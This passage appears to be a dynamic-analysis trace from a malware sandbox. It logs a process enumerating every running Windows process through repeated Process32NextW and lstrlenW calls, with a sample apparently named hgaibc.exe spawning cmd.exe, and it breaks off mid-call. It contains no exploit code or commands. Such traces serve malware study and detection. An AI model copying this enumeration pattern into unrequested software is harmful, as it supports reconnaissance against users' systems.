hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0065.316] lstrlenW (lpString="smss.exe") returned 8 [0065.316] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.317] lstrlenW (lpString="csrss.exe") returned 9 [0065.317] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0065.318] lstrlenW (lpString="wininit.exe") returned 11 [0065.318] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.319] lstrlenW (lpString="csrss.exe") returned 9 [0065.319] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0065.320] lstrlenW (lpString="winlogon.exe") returned 12 [0065.320] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0065.321] lstrlenW (lpString="services.exe") returned 12 [0065.321] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0065.321] lstrlenW (lpString="lsass.exe") returned 9 [0065.321] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.322] lstrlenW (lpString="svchost.exe") returned 11 [0065.322] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0065.323] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0065.323] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0065.324] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0065.324] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.325] lstrlenW (lpString="svchost.exe") returned 11 [0065.325] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0065.326] lstrlenW (lpString="dwm.exe") returned 7 [0065.326] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.327] lstrlenW (lpString="svchost.exe") returned 11 [0065.327] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.328] lstrlenW (lpString="svchost.exe") returned 11 [0065.328] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.329] lstrlenW (lpString="svchost.exe") returned 11 [0065.329] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.330] lstrlenW (lpString="svchost.exe") returned 11 [0065.330] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.331] lstrlenW (lpString="svchost.exe") returned 11 [0065.331] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.332] lstrlenW (lpString="svchost.exe") returned 11 [0065.332] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.332] lstrlenW (lpString="svchost.exe") returned 11 [0065.333] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.334] lstrlenW (lpString="svchost.exe") returned 11 [0065.334] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.334] lstrlenW (lpString="svchost.exe") returned 11 [0065.334] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0065.335] lstrlenW (lpString="spoolsv.exe") returned 11 [0065.335] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.336] lstrlenW (lpString="svchost.exe") returned 11 [0065.336] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.337] lstrlenW (lpString="svchost.exe") returned 11 [0065.337] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0065.338] lstrlenW (lpString="audiodg.exe") returned 11 [0065.338] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0065.339] lstrlenW (lpString="sihost.exe") returned 10 [0065.339] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.340] lstrlenW (lpString="svchost.exe") returned 11 [0065.340] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0065.718] lstrlenW (lpString="taskhostw.exe") returned 13 [0065.718] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0065.719] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0065.719] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0065.720] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0065.720] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0065.721] lstrlenW (lpString="explorer.exe") returned 12 [0065.721] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0065.721] lstrlenW (lpString="Memory Compression") returned 18 [0065.722] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0065.723] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0065.723] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0065.724] lstrlenW (lpString="SearchUI.exe") returned 12 [0065.724] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0065.725] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0065.725] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.725] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0065.726] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0065.726] lstrlenW (lpString="taskhostw.exe") returned 13 [0065.726] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0065.727] lstrlenW (lpString="UsoClient.exe") returned 13 [0065.727] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0065.728] lstrlenW (lpString="taskhostw.exe") returned 13 [0065.728] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0065.729] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0065.729] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0065.730] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0065.730] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0065.731] lstrlenW (lpString="msoia.exe") returned 9 [0065.731] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0065.732] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0065.732] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0065.733] lstrlenW (lpString="screensaver.exe") returned 15 [0065.733] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0065.734] lstrlenW (lpString="xml upper.exe") returned 13 [0065.734] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0065.735] lstrlenW (lpString="defeat preston.exe") returned 18 [0065.735] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0065.736] lstrlenW (lpString="boss isolated.exe") returned 17 [0065.736] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0065.737] lstrlenW (lpString="member.exe") returned 10 [0065.737] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0065.738] lstrlenW (lpString="chubby-er.exe") returned 13 [0065.738] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0065.739] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0065.739] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0065.740] lstrlenW (lpString="organization.exe") returned 16 [0065.740] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0065.742] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0065.742] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0065.743] lstrlenW (lpString="spray-roman.exe") returned 15 [0065.743] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0065.744] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0065.744] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0065.745] lstrlenW (lpString="tank attacks.exe") returned 16 [0065.745] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0065.745] lstrlenW (lpString="wires jacket.exe") returned 16 [0065.746] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0065.747] lstrlenW (lpString="values.exe") returned 10 [0065.747] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0065.748] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0065.748] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0065.749] lstrlenW (lpString="printersaerospace.exe") returned 21 [0065.749] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0066.145] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0066.145] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0066.146] lstrlenW (lpString="dllhost.exe") returned 11 [0066.146] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0066.147] lstrlenW (lpString="joke.exe") returned 8 [0066.147] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0066.148] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0066.148] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0066.149] lstrlenW (lpString="documents.exe") returned 13 [0066.149] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0066.151] lstrlenW (lpString="rebel.exe") returned 9 [0066.151] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0066.152] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0066.152] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.153] lstrlenW (lpString="conhost.exe") returned 11 [0066.153] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.154] lstrlenW (lpString="conhost.exe") returned 11 [0066.154] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0066.155] lstrlenW (lpString="hgaibc.exe") returned 10 [0066.155] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0066.156] lstrlenW (lpString="cmd.exe") returned 7 [0066.156] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0066.157] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0066.157] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: 